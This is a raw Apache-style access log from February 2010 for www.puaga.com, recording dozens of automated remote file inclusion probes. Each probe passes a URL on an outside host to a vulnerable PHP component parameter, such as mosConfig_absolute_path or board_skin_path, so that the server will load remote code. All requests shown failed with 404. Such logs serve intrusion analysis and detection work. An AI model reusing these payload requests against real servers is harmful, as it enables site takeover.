81.26.219.151 - - [08/Feb/2010:09:32:48 -0800] "GET /logs/access_100129.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:32:48 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.115.213.195 - - [08/Feb/2010:09:32:51 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:33:21 -0800] "GET /logs//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:33:21 -0800] "GET /excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:33:21 -0800] "GET /logs/access_100125.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:33:28 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:33:29 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:33:29 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:33:30 -0800] "GET /logs/access_100115.log/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:33:32 -0800] "GET /logs/access_100108.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:33:36 -0800] "GET /logs/access_100103.log//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:33:39 -0800] "GET /logs/access_100110.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.17.109.216 - - [08/Feb/2010:09:33:45 -0800] "GET /logs/access_100103.log//admin/admin_news_bot.php?root_path=http://www.wvblazers.com//administrator/components/com_virtuemart/sql/other/c1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:33:54 -0800] "GET /logs/access_100109.log%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:33:54 -0800] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
221.143.40.35 - - [08/Feb/2010:09:33:55 -0800] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://eroadsky.com/new/autoalbum/Links/image3.jpg??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:02 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:02 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:03 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:34 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:34 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:34:37 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:34:48 -0800] "GET /logs/access_100126.log//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:34:54 -0800] "GET /write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:34:54 -0800] "GET /logs/access_100202.log%20%20//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:34:54 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:35:08 -0800] "GET /logs/access_100131.log%20%20//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:35:17 -0800] "GET /logs/access_100110.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:35:25 -0800] "GET /logs/access_100113.log%20%20//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:35:37 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:35:37 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:35:37 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:36:12 -0800] "GET /logs/access_100110.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:36:27 -0800] "GET /logs/access_100110.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:36:45 -0800] "GET /logs/access_100110.log/ncaster/admin/addons/archive/archive.php?adminfolder=http://qqe.ru//forum/avatars/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:36:58 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:36:59 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:37:01 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:37:11 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:37:11 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.116.103.96 - - [08/Feb/2010:09:37:12 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:38:28 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:38:28 -0800] "GET /logs/access_100201.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:38:28 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:31 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:31 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:35 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:45 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:45 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:45 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:59 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:38:59 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:39:04 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:39:09 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:39:09 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:39:14 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
79.98.23.9 - - [08/Feb/2010:09:40:44 -0800] "GET /logs/access_100108.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:40:54 -0800] "GET /logs/access_100129.log%20%20//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:40:54 -0800] "GET /logs//write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.26.219.151 - - [08/Feb/2010:09:40:54 -0800] "GET /write_update.php?board_skin_path=http://www.sarpifirenze.it/media/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:41:06 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:41:06 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:41:07 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:41:18 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
115.93.146.76 - - [08/Feb/2010:09:41:32 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://cfd.pusan.ac.kr/bbs//fx29id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:41:35 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:42:15 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.95.78.56 - - [08/Feb/2010:09:42:21 -0800] "GET /logs/access_100110.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://210.205.6.168/~shop/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:09:42:41 -0800] "GET /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:09:42:41 -0800] "GET /logs/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:09:42:42 -0800] "GET /logs/access_100106.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:42:47 -0800] "GET ////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:42:47 -0800] "GET /logs/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
143.248.176.79 - - [08/Feb/2010:09:42:52 -0800] "GET /logs/access_100121.log%20%20/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.leiterschaft.de/cms/public/lengkap/idlab1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:42:57 -0800] "GET /logs/access_100103.log/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.12.33.30 - - [08/Feb/2010:09:43:25 -0800] "GET /logs/access_100115.log/////delete_all.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:43:39 -0800] "GET /logs/access_100201.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.190.243.10 - - [08/Feb/2010:09:43:52 -0800] "GET /logs/access_100108.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:37 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:37 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:37 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:39 -0800] "GET /logs/access_100127.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:44:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:44:50 -0800] "GET /logs/access_100125.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:45:25 -0800] "GET /write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:45:27 -0800] "GET /accounts/inc/errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:45:34 -0800] "GET /logs/access_100129.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:45:35 -0800] "GET /logs//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
118.129.166.178 - - [08/Feb/2010:09:45:35 -0800] "GET /logs/access_100202.log//write_comment_update.php/?board_skin_path=http://kjmed.net/bbs/idfx1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:45:51 -0800] "GET /logs/access_100110.log//accounts/inc/errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:45:51 -0800] "GET /logs//accounts/inc/errors.php?error=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [08/Feb/2010:09:46:03 -0800] "GET /logs/access_100113.log//excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:09:46:13 -0800] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
58.150.99.131 - - [08/Feb/2010:09:46:13 -0800] "GET /logs///components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://detiinfo.ru//mambots/system/test.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:16 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:16 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:16 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:46:21 -0800] "GET /logs///bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:46:21 -0800] "GET //bbs///delete_all.php?board_skin_path=http://qqe.ru/forum/Smileys/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:46:29 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:46:29 -0800] "GET /logs/access_100120.log%20%20//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
81.176.226.164 - - [08/Feb/2010:09:46:29 -0800] "GET /logs//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:35 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:35 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:35 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:38 -0800] "GET /logs/access.log%20%20//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:38 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:38 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:39 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:39 -0800] "GET /logs/access.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.93.149.176 - - [08/Feb/2010:09:46:39 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://kizuna-animes.net/x? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.38.136.126 - - [08/Feb/2010:09:46:43 -0800] "GET /modules/Forums/admin/admin_styles.php?phpbb_root_path=http://ldrneurosurgery.net/help/1.jpg?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
